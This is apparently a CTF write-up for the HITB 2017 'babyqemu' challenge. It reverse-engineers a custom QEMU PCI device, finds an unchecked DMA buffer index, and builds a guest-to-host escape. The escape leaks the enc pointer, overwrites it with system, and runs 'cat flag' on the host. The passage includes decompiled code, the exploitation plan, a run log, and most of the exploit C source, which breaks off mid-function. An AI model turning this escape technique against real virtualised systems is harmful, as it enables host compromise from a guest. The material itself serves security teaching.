First, look at the launch script; the bug is clearly somewhere in the hitb device.
#! /bin/sh
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-enable-kvm \
-monitor /dev/null \
-m 64M --nographic -L ./dependency/usr/local/share/qemu \
-L pc-bios \
-device hitb,id=vda
Note that logging in as root requires no password.
Load the binary into IDA. Since it still has symbols, searching the function list for "hitb" brings up all the related functions. From the class-init function below we can see that the device ID is 0x2333 (the WORD1 write is the device ID), that pci_hitb_realize is registered as the initialization (realize) callback, and that pci_hitb_uninit is its counterpart, doing the destroy/del cleanup.
void __fastcall hitb_class_init(ObjectClass_0 *a1, void *data)
{
  ObjectClass_0 *v2; // rax

  v2 = object_class_dynamic_cast_assert(
         a1,
         "pci-device",
         "/mnt/hgfs/eadom/workspcae/projects/hitbctf2017/babyqemu/qemu/hw/misc/hitb.c",
         469,
         "hitb_class_init");
  BYTE4(v2[2].object_cast_cache[3]) = 0x10;
  HIWORD(v2[2].object_cast_cache[3]) = 0xFF;
  v2[2].type = (Type)pci_hitb_realize;
  v2[2].object_cast_cache[0] = (const char *)pci_hitb_uninit;
  LOWORD(v2[2].object_cast_cache[3]) = 0x1234;
  WORD1(v2[2].object_cast_cache[3]) = 0x2333;   // device_id
}
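The raw field writes are easier to read when mapped back onto QEMU's PCIDeviceClass. Below is a hypothetical reconstruction of what hitb_class_init probably looked like in hitb.c; the field names come from PCIDeviceClass, and this is only an assumption based on the decompilation (in the style of QEMU's "edu" example device), not the actual source:

/* Hypothetical reconstruction of hitb_class_init (assumption based on the
 * decompiled field offsets; mirrors QEMU's "edu" example device). */
static void hitb_class_init(ObjectClass *class, void *data)
{
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);

    k->realize   = pci_hitb_realize;   /* v2[2].type                   */
    k->exit      = pci_hitb_uninit;    /* v2[2].object_cast_cache[0]   */
    k->vendor_id = 0x1234;             /* LOWORD(...) = 0x1234         */
    k->device_id = 0x2333;             /* WORD1(...)  = 0x2333         */
    k->revision  = 0x10;               /* BYTE4(...)  = 0x10           */
    k->class_id  = 0xFF;               /* HIWORD(...) = 0xFF           */
}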
In IDA's Local Types window we can also search for hitb and see the device's data structure:
struct __attribute__((aligned(16))) HitbState
{
  PCIDevice_0 pdev;
  MemoryRegion_0 mmio;
  QemuThread_0 thread;
  QemuMutex_0 thr_mutex;
  QemuCond_0 thr_cond;
  _Bool stopping;
  uint32_t addr4;
  uint32_t fact;
  uint32_t status;
  uint32_t irq_status;
  dma_state dma;
  QEMUTimer_0 dma_timer;
  char dma_buf[4096];
  void (*enc)(char *, unsigned int);
  uint64_t dma_mask;
};
Looking at it in the Structures window is handier, because the offsets are shown:
00000000 HitbState struc ; (sizeof=0x1BD0, align=0x10, copyof_1493)
00000000 pdev PCIDevice_0 ?
000009F0 mmio MemoryRegion_0 ?
00000AF0 thread QemuThread_0 ?
00000AF8 thr_mutex QemuMutex_0 ?
00000B20 thr_cond QemuCond_0 ?
00000B50 stopping db ?
00000B51 db ? ; undefined
00000B52 db ? ; undefined
00000B53 db ? ; undefined
00000B54 addr4 dd ?
00000B58 fact dd ?
00000B5C status dd ?
00000B60 irq_status dd ?
00000B64 db ? ; undefined
00000B65 db ? ; undefined
00000B66 db ? ; undefined
00000B67 db ? ; undefined
00000B68 dma dma_state ?
00000B88 dma_timer QEMUTimer_0 ?
00000BB8 dma_buf db 4096 dup(?)
00001BB8 enc dq ? ; offset
00001BC0 dma_mask dq ?
00001BC8 db ? ; undefined
00001BC9 db ? ; undefined
00001BCA db ? ; undefined
00001BCB db ? ; undefined
00001BCC db ? ; undefined
00001BCD db ? ; undefined
00001BCE db ? ; undefined
00001BCF db ? ; undefined
00001BD0 HitbState ends
There are two related structures as well:
00000000 dma_state struc ; (sizeof=0x20, align=0x8, copyof_1491)
00000000 ; XREF: HitbState/r
00000000 src dq ?
00000008 dst dq ?
00000010 cnt dq ?
00000018 cmd dq ?
00000020 dma_state ends
00000020
00000000 ; ---------------------------------------------------------------------------
00000000
00000000 QEMUTimer_0 struc ; (sizeof=0x30, align=0x8, copyof_529)
00000000 ; XREF: HitbState/r
00000000 expire_time dq ?
00000008 timer_list dq ? ; offset
00000010 cb dq ? ; offset
00000018 opaque dq ? ; offset
00000020 next dq ? ; offset
00000028 scale dd ?
0000002C db ? ; undefined
0000002D db ? ; undefined
0000002E db ? ; undefined
0000002F db ? ; undefined
00000030 QEMUTimer_0 ends
Now look at pci_hitb_realize:
void __fastcall pci_hitb_realize(HitbState *pdev, Error_0 **errp)
{
  pdev->pdev.config[61] = 1;
  if ( !msi_init(&pdev->pdev, 0, 1u, 1, 0, errp) )
  {
    timer_init_tl(&pdev->dma_timer, main_loop_tlg.tl[1], 1000000, (QEMUTimerCB *)hitb_dma_timer, pdev);
    qemu_mutex_init(&pdev->thr_mutex);
    qemu_cond_init(&pdev->thr_cond);
    qemu_thread_create(&pdev->thread, "hitb", (void *(*)(void *))hitb_fact_thread, pdev, 0);
    memory_region_init_io(&pdev->mmio, &pdev->pdev.qdev.parent_obj, &hitb_mmio_ops, pdev, "hitb-mmio", 0x100000uLL);
    pci_register_bar(&pdev->pdev, 0, 0, &pdev->mmio);
  }
}
timer_init_tl initializes &pdev->dma_timer with hitb_dma_timer as its callback and pdev as the callback argument; this follows from the QEMU source and comment below. The second-to-last call, memory_region_init_io, initializes the memory-mapped I/O region and binds it to &hitb_mmio_ops, whose read and write members point to hitb_mmio_read and hitb_mmio_write. Finally, pci_register_bar registers &pdev->mmio into one of the PCI device's BARs (Base Address Registers, which record the type, base address and other attributes of the address space the device needs). Its second argument, 0, is the BAR index, and its third argument, 0 (PCI_BASE_ADDRESS_SPACE_MEMORY), selects an MMIO BAR; a value of 1 (PCI_BASE_ADDRESS_SPACE_IO) would register PMIO instead.
/**
* timer_init_tl:
* @ts: the timer to be initialised
* @timer_list: the timer list to attach the timer to
* @scale: the scale value for the timer
* @cb: the callback to be called when the timer expires
* @opaque: the opaque pointer to be passed to the callback
*
* Initialise a new timer and associate it with @timer_list.
* The caller is responsible for allocating the memory.
*
* You need not call an explicit deinit call. Simply make
* sure it is not on a list with timer_del.
*/
void timer_init_tl(QEMUTimer *ts,
                   QEMUTimerList *timer_list, int scale,
                   QEMUTimerCB *cb, void *opaque)
{
    ts->timer_list = timer_list;
    ts->cb = cb;
    ts->opaque = opaque;
    ts->scale = scale;
    ts->expire_time = -1;
}
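For reference, here are the prototypes of the other two calls, taken from QEMU's public headers (exact signatures can vary slightly between versions):

/* include/exec/memory.h */
void memory_region_init_io(MemoryRegion *mr, Object *owner,
                           const MemoryRegionOps *ops, void *opaque,
                           const char *name, uint64_t size);

/* include/hw/pci/pci.h */
void pci_register_bar(PCIDevice *pci_dev, int region_num,
                      uint8_t type, MemoryRegion *memory);

/* type values for pci_register_bar (standard PCI definitions) */
#define PCI_BASE_ADDRESS_SPACE_MEMORY 0x00   /* MMIO BAR */
#define PCI_BASE_ADDRESS_SPACE_IO     0x01   /* PMIO BAR */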
Back in the guest, let's look at the PCI devices. From the device ID we can tell ours is the last entry. The system is so minimal that lspci -v shows no detailed information at all:
# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
So we look it up through the filesystem instead, where the MMIO information is visible: the region starts at 0x00000000fea00000, and from the second address (the end) the size works out to 0xfeafffff - 0xfea00000 + 1 = 0x100000.
# cat /sys/devices/pci0000\:00/0000:00\:04.0/resource
0x00000000fea00000 0x00000000feafffff 0x0000000000040200
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
Besides hitb_class_init there is another initialization function, hitb_instance_init; both are referenced from hitb_info_27046:
.data.rel.ro:0000000000969020 ; Function-local static variable
.data.rel.ro:0000000000969020 ; const TypeInfo_0 hitb_info_27046
.data.rel.ro:0000000000969020 hitb_info_27046 dq offset aHitb ; name
.data.rel.ro:0000000000969020 ; DATA XREF: pci_hitb_register_types↑o
.data.rel.ro:0000000000969020 dq offset aVirtioPciDevic+7; parent ; "hitb" ...
.data.rel.ro:0000000000969020 dq 1BD0h ; instance_size
.data.rel.ro:0000000000969020 dq offset hitb_instance_init; instance_init
.data.rel.ro:0000000000969020 dq 0 ; instance_post_init
.data.rel.ro:0000000000969020 dq 0 ; instance_finalize
.data.rel.ro:0000000000969020 db 0 ; abstract
.data.rel.ro:0000000000969020 db 7 dup(0)
.data.rel.ro:0000000000969020 dq 0 ; class_size
.data.rel.ro:0000000000969020 dq offset hitb_class_init; class_init
.data.rel.ro:0000000000969020 dq 0 ; class_base_init
.data.rel.ro:0000000000969020 dq 0 ; class_finalize
.data.rel.ro:0000000000969020 dq 0 ; class_data
.data.rel.ro:0000000000969020 dq 0 ; interfaces
.data.rel.ro:0000000000969088 align 20h
hitb_instance_init mainly initializes HitbState->enc to the function pointer hitb_enc.
Note: v1 += 0x1BC0 is the offset of dma_mask, and subtracting 8 gives the offset of enc.
void __fastcall hitb_instance_init(Object_0 *obj)
{
  __int64 v1; // rax

  v1 = (__int64)object_dynamic_cast_assert(
                  obj,
                  "hitb",
                  "/mnt/hgfs/eadom/workspcae/projects/hitbctf2017/babyqemu/qemu/hw/misc/hitb.c",
                  459,
                  "hitb_instance_init");
  *(_QWORD *)(v1 + 0x1BC0) = 0xFFFFFFFLL;
  v1 += 0x1BC0LL;
  *(_QWORD *)(v1 - 8) = hitb_enc;
  object_property_add(
    obj,
    "dma_mask",
    "uint64",
    (ObjectPropertyAccessor *)hitb_obj_uint64,
    (ObjectPropertyAccessor *)hitb_obj_uint64,
    0LL,
    (void *)v1,
    0LL);
}
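Mapped back onto the struct fields, the function is roughly equivalent to the following reconstruction (an assumption based on the decompilation; the HITB() cast macro is a guess in the style of QEMU's edu device):

/* Hypothetical reconstruction of hitb_instance_init (assumption). */
static void hitb_instance_init(Object *obj)
{
    HitbState *hitb = HITB(obj);        /* HITB() cast macro assumed */

    hitb->dma_mask = 0x0FFFFFFF;        /* (1 << 28) - 1             */
    hitb->enc      = hitb_enc;          /* the "encryption" routine  */
    object_property_add(obj, "dma_mask", "uint64",
                        hitb_obj_uint64, hitb_obj_uint64,
                        NULL, &hitb->dma_mask, NULL);
}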
Finally, setting the challenge aside for a moment, how do these two init functions get called in the first place? Tracing backwards, the chain runs like this: _start calls __libc_start_main, which calls __libc_csu_init, and __libc_csu_init loops over the function pointers stored in __frame_dummy_init_array_entry[]:
void __fastcall _libc_csu_init(unsigned int a1, __int64 a2, __int64 a3)
{
  __int64 v3; // r13
  signed __int64 v4; // rbp
  __int64 v5; // rbx

  v3 = a3;
  v4 = &_do_global_dtors_aux_fini_array_entry - _frame_dummy_init_array_entry;
  init_proc();
  if ( v4 )
  {
    v5 = 0LL;
    do
      ((void (__fastcall *)(_QWORD, __int64, __int64))_frame_dummy_init_array_entry[v5++])(a1, a2, v3);
    while ( v5 != v4 );
  }
}
Among the pointers in _frame_dummy_init_array_entry[] is the following one:
.init_array:0000000000964D68 dq offset do_qemu_init_pci_hitb_register_types
Following this path, it ends up registering exactly hitb_info_27046:
void __cdecl do_qemu_init_pci_hitb_register_types()
{
  register_module_init((void (*)(void))pci_hitb_register_types, MODULE_INIT_QOM_0);
}

void __cdecl pci_hitb_register_types()
{
  type_register_static(&hitb_info_27046);
}
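In the QEMU source this do_qemu_init_* wrapper is generated by the type_init() macro. A simplified sketch of the expansion from include/qemu/module.h (details differ between QEMU versions):

/* Simplified from include/qemu/module.h: type_init(fn) defines an ELF
 * constructor (placed in .init_array, which is exactly what __libc_csu_init
 * iterates) that queues fn into the MODULE_INIT_QOM list; QEMU's main()
 * later drains that list via module_call_init(MODULE_INIT_QOM). */
#define module_init(function, type)                                          \
    static void __attribute__((constructor)) do_qemu_init_ ## function(void) \
    {                                                                         \
        register_module_init(function, type);                                 \
    }
#define type_init(function) module_init(function, MODULE_INIT_QOM)

/* and hw/misc/hitb.c presumably contains: */
type_init(pci_hitb_register_types)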
The read handler:
uint64_t __fastcall hitb_mmio_read(HitbState *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result; // rax
  uint64_t val; // ST08_8

  result = -1LL;
  if ( size == 4 )
  {
    if ( addr == 128 )
      return opaque->dma.src;
    if ( addr > 0x80 )
    {
      if ( addr == 140 )
        return *(dma_addr_t *)((char *)&opaque->dma.dst + 4);
      if ( addr <= 0x8C )
      {
        if ( addr == 132 )
          return *(dma_addr_t *)((char *)&opaque->dma.src + 4);
        if ( addr == 136 )
          return opaque->dma.dst;
      }
      else
      {
        if ( addr == 144 )
          return opaque->dma.cnt;
        if ( addr == 152 )
          return opaque->dma.cmd;
      }
    }
    else
    {
      if ( addr == 8 )
      {
        qemu_mutex_lock(&opaque->thr_mutex);
        val = opaque->fact;
        qemu_mutex_unlock(&opaque->thr_mutex);
        return val;
      }
      if ( addr <= 8 )
      {
        result = 16777453LL;
        if ( !addr )
          return result;
        if ( addr == 4 )
          return opaque->addr4;
      }
      else
      {
        if ( addr == 32 )
          return opaque->status;
        if ( addr == 36 )
          return opaque->irq_status;
      }
    }
    result = -1LL;
  }
  return result;
}
The write handler:
void __fastcall hitb_mmio_write(HitbState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  uint32_t v4; // er13
  int v5; // edx
  bool v6; // zf
  int64_t v7; // rax

  if ( (addr > 0x7F || size == 4) && (!((size - 4) & 0xFFFFFFFB) || addr <= 0x7F) )
  {
    if ( addr == 128 )
    {
      if ( !(opaque->dma.cmd & 1) )
        opaque->dma.src = val;
    }
    else
    {
      v4 = val;
      if ( addr > 0x80 )
      {
        if ( addr == 140 )
        {
          if ( !(opaque->dma.cmd & 1) )
            *(dma_addr_t *)((char *)&opaque->dma.dst + 4) = val;
        }
        else if ( addr > 0x8C )
        {
          if ( addr == 144 )
          {
            if ( !(opaque->dma.cmd & 1) )
              opaque->dma.cnt = val;
          }
          else if ( addr == 152 && val & 1 && !(opaque->dma.cmd & 1) )
          {
            opaque->dma.cmd = val;
            v7 = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL_0);
            timer_mod(
              &opaque->dma_timer,
              ((signed __int64)((unsigned __int128)(4835703278458516699LL * (signed __int128)v7) >> 64) >> 18)
                - (v7 >> 63)
                + 100);
          }
        }
        else if ( addr == 132 )
        {
          if ( !(opaque->dma.cmd & 1) )
            *(dma_addr_t *)((char *)&opaque->dma.src + 4) = val;
        }
        else if ( addr == 136 && !(opaque->dma.cmd & 1) )
        {
          opaque->dma.dst = val;
        }
      }
      else if ( addr == 32 )
      {
        if ( val & 0x80 )
          _InterlockedOr((volatile signed __int32 *)&opaque->status, 0x80u);
        else
          _InterlockedAnd((volatile signed __int32 *)&opaque->status, 0xFFFFFF7F);
      }
      else if ( addr > 0x20 )
      {
        if ( addr == 96 )
        {
          v6 = ((unsigned int)val | opaque->irq_status) == 0;
          opaque->irq_status |= val;
          if ( !v6 )
            hitb_raise_irq(opaque, 0x60u);
        }
        else if ( addr == 100 )
        {
          v5 = ~(_DWORD)val;
          v6 = (v5 & opaque->irq_status) == 0;
          opaque->irq_status &= v5;
          if ( v6 && !msi_enabled(&opaque->pdev) )
            pci_set_irq(&opaque->pdev, 0);
        }
      }
      else if ( addr == 4 )
      {
        opaque->addr4 = ~(_DWORD)val;
      }
      else if ( addr == 8 && !(opaque->status & 1) )
      {
        qemu_mutex_lock(&opaque->thr_mutex);
        opaque->fact = v4;
        _InterlockedOr((volatile signed __int32 *)&opaque->status, 1u);
        qemu_cond_signal(&opaque->thr_cond);
        qemu_mutex_unlock(&opaque->thr_mutex);
      }
    }
  }
}
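Put together, the two handlers expose the following MMIO register map (offsets relative to BAR0; the names below are descriptive labels I chose, not names from the original source):

/* MMIO register map deduced from hitb_mmio_read / hitb_mmio_write. */
enum hitb_mmio_regs {
    HITB_ID         = 0x00, /* read-only, returns the constant 0x010000ED     */
    HITB_ADDR4      = 0x04, /* write stores ~val, read returns it             */
    HITB_FACT       = 0x08, /* factorial input/result, protected by the mutex */
    HITB_STATUS     = 0x20, /* bit0: computing; bit7: guest-settable flag     */
    HITB_IRQ_STATUS = 0x24, /* read-only                                      */
    HITB_IRQ_RAISE  = 0x60, /* write: OR bits into irq_status, raise IRQ      */
    HITB_IRQ_ACK    = 0x64, /* write: clear bits from irq_status              */
    HITB_DMA_SRC_LO = 0x80, /* dma.src, low/high 32 bits                      */
    HITB_DMA_SRC_HI = 0x84,
    HITB_DMA_DST_LO = 0x88, /* dma.dst, low/high 32 bits                      */
    HITB_DMA_DST_HI = 0x8C,
    HITB_DMA_CNT    = 0x90, /* dma.cnt                                        */
    HITB_DMA_CMD    = 0x98, /* dma.cmd; writing with bit0 set arms the timer  */
};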
As you can see, the read handler only returns HitbState fields and the write handler only writes to them, so there should be no bug there. What deserves attention is the following fragment of the write handler, which should end up invoking opaque->dma_timer's callback, hitb_dma_timer:
else if ( addr == 152 && val & 1 && !(opaque->dma.cmd & 1) )
{
  opaque->dma.cmd = val;
  v7 = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL_0);
  timer_mod(
    &opaque->dma_timer,
    ((signed __int64)((unsigned __int128)(4835703278458516699LL * (signed __int128)v7) >> 64) >> 18)
      - (v7 >> 63)
      + 100);
}
qemu_clock_get_ns returns the current clock value in nanoseconds and timer_mod updates dma_timer's expire_time, which is what triggers the later call to hitb_dma_timer. The 128-bit multiply by 4835703278458516699 followed by the shifts is just compiler-generated division by 1,000,000; since the timer's scale is 1,000,000 ns, the timer is armed to fire roughly 100 ms after the write.
The definitions of these two functions are here: https://github.com/qemu/qemu/blob/f2cfa1229e539ee1bb1822912075cf25538ad6b9/include/qemu/timer.h#L96 https://github.com/qemu/qemu/blob/f2cfa1229e539ee1bb1822912075cf25538ad6b9/include/qemu/timer.h#L666
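Substituting the division back in, the addr == 152 branch amounts to the following (a simplified sketch; QEMU_CLOCK_VIRTUAL is what the decompiler labels QEMU_CLOCK_VIRTUAL_0):

/* Simplified equivalent of the addr == 152 (0x98) branch: start a "DMA"
 * by recording cmd and arming dma_timer ~100 ms in the future
 * (expire_time is in units of scale = 1,000,000 ns, i.e. milliseconds). */
if (addr == 0x98 && (val & 1) && !(opaque->dma.cmd & 1)) {
    opaque->dma.cmd = val;
    timer_mod(&opaque->dma_timer,
              qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) / 1000000 + 100);
}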
Now look at hitb_dma_timer. This function essentially emulates DMA (Direct Memory Access) and lets us read from and write to dma_buf. (Wikipedia's description: Direct Memory Access (DMA) is a memory-access technique that allows certain hardware subsystems (peripherals) to read and write system memory directly, without involving the CPU.)
void __fastcall hitb_dma_timer(HitbState *opaque)
{
  dma_addr_t v1; // rax
  __int64 v2; // rdx
  uint8_t *v3; // rsi
  dma_addr_t v4; // rax
  dma_addr_t v5; // rdx
  uint8_t *v6; // rbp
  uint8_t *v7; // rbp

  v1 = opaque->dma.cmd;
  if ( v1 & 1 )
  {
    if ( v1 & 2 )
    {
      v2 = (unsigned int)(LODWORD(opaque->dma.src) - 0x40000);
      if ( v1 & 4 )
      {
        v7 = (uint8_t *)&opaque->dma_buf[v2];
        ((void (__fastcall *)(uint8_t *, _QWORD))opaque->enc)(v7, LODWORD(opaque->dma.cnt));
        v3 = v7;
      }
      else
      {
        v3 = (uint8_t *)&opaque->dma_buf[v2];
      }
      cpu_physical_memory_rw(opaque->dma.dst, v3, opaque->dma.cnt, 1); // 1 means write
      v4 = opaque->dma.cmd;
      v5 = opaque->dma.cmd & 4;
    }
    else
    {
      v6 = (uint8_t *)&opaque[-36] + (unsigned int)opaque->dma.dst - 2824;
      LODWORD(v3) = (_DWORD)opaque + opaque->dma.dst - 0x40000 + 3000;
      cpu_physical_memory_rw(opaque->dma.src, v6, opaque->dma.cnt, 0);
      v4 = opaque->dma.cmd;
      v5 = opaque->dma.cmd & 4;
      if ( opaque->dma.cmd & 4 )
      {
        v3 = (uint8_t *)LODWORD(opaque->dma.cnt);
        ((void (__fastcall *)(uint8_t *, uint8_t *, dma_addr_t))opaque->enc)(v6, v3, v5);
        v4 = opaque->dma.cmd;
        v5 = opaque->dma.cmd & 4;
      }
    }
    opaque->dma.cmd = v4 & 0xFFFFFFFFFFFFFFFELL; // clear the lowest bit of cmd
    if ( v5 )
    {
      opaque->irq_status |= 0x100u;
      hitb_raise_irq(opaque, (uint32_t)v3);
    }
  }
}
The function picks a branch according to opaque->dma.cmd, but the lowest bit of cmd must be 1.
The two branches are what matters: one is taken when cmd & 2 is set (the second bit is 1), the other when that bit is 0.
First look at cpu_physical_memory_rw, which both branches call; it ends up in address_space_rw:
void __fastcall cpu_physical_memory_rw(hwaddr addr, uint8_t *buf, int len, int is_write)
{
  int v4; // er8
  MemTxAttrs_0 v5; // 0:dl.1

  v4 = len;
  v5 = (MemTxAttrs_0)1;
  address_space_rw(&address_space_memory, addr, v5, buf, v4, is_write != 0);
}

MemTxResult __fastcall address_space_rw(AddressSpace_0 *as, hwaddr addr, MemTxAttrs_0 attrs, uint8_t *buf, int len, _Bool is_write)
{
  MemTxResult result; // eax

  if ( is_write )
    result = address_space_write(as, addr, attrs, buf, len);
  else
    result = address_space_read_full(as, addr, attrs, buf, len);
  return result;
}
So in the first branch the last argument of cpu_physical_memory_rw is 1, and it ultimately calls address_space_write; the second branch of course ends up in address_space_read_full. Reading address_space_write, cpu_physical_memory_rw(opaque->dma.dst, v3, opaque->dma.cnt, 1) copies v3 out to opaque->dma.dst, i.e. it reads dma_buf[opaque->dma.src - 0x40000] into guest memory at opaque->dma.dst. Conversely, cpu_physical_memory_rw(opaque->dma.src, v6, opaque->dma.cnt, 0) copies from opaque->dma.src into v6, i.e. it writes the contents at opaque->dma.src into dma_buf[opaque->dma.dst - 0x40000].
Note that the first argument of cpu_physical_memory_rw is a hardware address, i.e. a guest-physical address, so inside the guest we have to translate our virtual addresses to physical ones.
After all this analysis, the vulnerability is clear: the index into dma_buf is not bounds-checked in any way, giving out-of-bounds reads and writes.
To recap: the first argument of cpu_physical_memory_rw is a guest-physical address, and the whole mechanism acts as a middleman. With cmd = 1|2 we can use the out-of-bounds index to copy host data (the pointer we want to leak) into a guest-physical address we control, then read it from the guest, completing the leak. With cmd = 1 we can write the value stored at a guest-physical address to an arbitrary out-of-bounds offset (we simply place the value at that physical address from the guest beforehand).
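In pseudo-C the two primitives therefore look like this (a summary of hitb_dma_timer with the enc branch omitted; dma.src, dma.dst and dma.cnt are fully guest-controlled via MMIO):

/* Sketch of the two DMA primitives derived from hitb_dma_timer.
 * dma_buf is the 4096-byte buffer inside HitbState; the index is never
 * bounds-checked, so offsets past 4095 reach enc, dma_mask and beyond. */

/* cmd = 1|2: device -> guest RAM, i.e. out-of-bounds READ of HitbState */
cpu_physical_memory_rw(opaque->dma.dst,                                 /* guest-physical dest   */
                       (uint8_t *)&opaque->dma_buf[opaque->dma.src - 0x40000], /* unchecked index */
                       opaque->dma.cnt, /*is_write=*/1);

/* cmd = 1: guest RAM -> device, i.e. out-of-bounds WRITE into HitbState */
cpu_physical_memory_rw(opaque->dma.src,                                 /* guest-physical source */
                       (uint8_t *)&opaque->dma_buf[opaque->dma.dst - 0x40000], /* unchecked index */
                       opaque->dma.cnt, /*is_write=*/0);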
Exploitation plan:
1. Leak the function pointer enc. Since this qemu-system-x86_64's import table contains system, we can compute system@plt directly from the leak.
2. Overwrite the enc pointer with system.
3. Write the command to execute, e.g. cat flag, into opaque->dma_buf.
4. Trigger with cmd = 1|2|4 so that the enc call fires, hijacking control flow.
One pitfall when writing the exploit: an mmio_write of an 8-byte value is performed as two 4-byte writes, so it also clobbers the neighbouring register; therefore the registers must be set strictly in the order src, dst, cnt.
Create a flag file in the challenge directory for testing:
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ ls
babyqemu.tar.gz exp launch.sh qemu-system-x86_64 start.txt
breakpoint.txt exp.c pc-bios rootfs vmlinuz-4.8.0-52-generic
cpexptorootfs.sh flag peda-session-qemu-system-x86_64.txt rootfs.cpio
giantbranch@ubuntu:~/qemu_escape/HITB-GSEC-2017-babyqemu$ cat flag
flag{You escaped successfully!}
Below is the result of escaping and executing system("cat flag") on the host. (With -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' and --nographic, the guest console shares the terminal with the QEMU process, so the output of the host-side system(cmd) shows up right in the guest's console.)
__ __ _ _ _ _ ___ _____ ____
\ \ / /__| | ___ ___ _ __ ___ ___ | |_ ___ | | | |_ _|_ _| __ )
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \ | __/ _ \ | |_| || | | | | _ \
\ V V / __/ | (_| (_) | | | | | | __/ | || (_) | | _ || | | | | |_) |
\_/\_/ \___|_|\___\___/|_| |_| |_|\___| \__\___/ |_| |_|___| |_| |____/
Welcome to HITB
HITB login: root
# ./exp
mmio_base Resource0Base: 0x7ff8115c9000
gva_to_gpa tmpbuf_phys_addr 0x1dee890
hitb_enc_addr: 0x55c0aa03bdd0
binary_base_addr: 0x55c0a9db8000
system_addr: 0x55c0a9fb5b18
flag{You escaped successfully!}
#
As a bonus, you can also try popping a calculator.
The final exploit:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <ctype.h>
#include <termios.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/io.h>

#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)
#define DMA_BASE 0x40000
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

char* pci_device_name = "/sys/devices/pci0000:00/0000:00:04.0/resource0";
unsigned char* tmpbuf;
uint64_t tmpbuf_phys_addr;
unsigned char* mmio_base;

unsigned char* getMMIOBase(){
    int fd;
    if((fd = open(pci_device_name, O_RDWR | O_SYNC)) == -1) {
        perror("open pci device");
        exit(-1);
    }
    mmio_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(mmio_base == (void *) -1) {
        perror("mmap");
        exit(-1);
    }
    return mmio_base;
}

// get the offset within the page
uint32_t page_offset(uint32_t addr)
{
    // addr & 0xfff
    return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    size_t offset;
    int fd;
    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }
    // printf("pfn_item_offset : %p\n", (uintptr_t)addr >> 9);
    offset = ((uintptr_t)addr >> 9) & ~7;
    // The commented-out lines below are someone else's version of the same
    // computation, kept only to explain the expression above:
    // first divide by 0x1000 (getpagesize() = 0x1000, 4 KiB pages; the low 12
    // bits are just the in-page offset and get dropped), i.e. divide by 2**12,
    // which yields the page number;
    // each pagemap entry is 64 bits = 8 bytes = sizeof(uint64_t), so once we
    // have the page number we multiply by 8 to get the file offset of its entry;
    // in the end vir/2^12 * 8 = (vir / 2^9) & ~7,
    // which matches the >> 9 above. Why the & ~7? Because vir >> 12 << 3 differs
    // from vir >> 9: the former always has its low 3 bits clear, so we clear
    // them explicitly with & ~7.
    // int page_size=getpagesize();
    // unsigned long vir_page_idx = vir/page_size;
    // unsigned long pfn_item_offset = vir_page_idx*sizeof(uint64_t);
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    // make sure the page is present
    if (!(pme & PFN_PRESENT))
        return -1;
    // physical frame number
    gfn = pme & PFN_PFN;
    return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != -1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

void mmio_write(uint64_t addr, uint64_t value)
{
    *((uint64_t*)(mmio_base + addr)) = value;
}

uint64_t mmio_read(uint64_t addr)
{
    return *((uint64_t*)(mmio_base + addr));
}

void set_cnt(uint64_t val)
{
    mmio_write(144, val);
}

void set_src(uint64_t val)
{
    mmio_write(128, val);
}

void set_dst(uint64_t val)
{
    mmio_write(136, val);
}

void start_dma_timer(uint64_t val){
    mmio_write(152, val);
}

void dma_read(uint64_t offset, uint64_t cnt){
    // set the index into dma_buf
    set_src(DMA_BASE + offset);
    // set the physical address the data will be written to
    set_dst(tmpbuf_phys_addr);
    // set the size to read
    set_cnt(cnt);
    // trigger hitb_dma_timer
    start_dma_timer(1|2);
    // wait for the timer callback to run
    sleep(1);
}

void dma_write(uint64_t offset, char* buf, uint64_t cnt)
{
    // copy what we want to write into tmpbuf first
    memcpy(tmpbuf, buf, cnt);
    // set the physical address to read from (it gets copied into dma_buf[opaque->dma.dst-0x40000])
    set_src(tmpbuf_phys_addr);
    // set the index into dma_buf
    set_dst(DMA_BASE + offset);
    // set the size to write
    set_cnt(cnt);
    // trigger hitb_dma_timer
    start_dma_timer(1);
    // wait for the timer callback to run
